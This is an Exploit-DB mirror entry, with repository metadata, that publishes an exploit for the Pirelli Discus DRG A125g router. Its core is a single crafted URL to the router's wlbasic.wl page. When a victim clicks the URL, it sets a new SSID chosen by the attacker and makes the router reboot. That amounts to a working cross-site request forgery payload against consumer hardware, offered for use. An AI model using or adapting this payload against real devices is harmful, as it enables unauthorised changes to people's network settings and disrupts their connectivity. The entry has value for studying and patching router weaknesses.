exploit-db-mirror/platforms/hardware/webapps/29794.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

21 lines
600 B
Text
Executable file

# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) ?lpha
#(")(")
#Exploit:
http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof
#info: where the parameter "wlSsid" is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.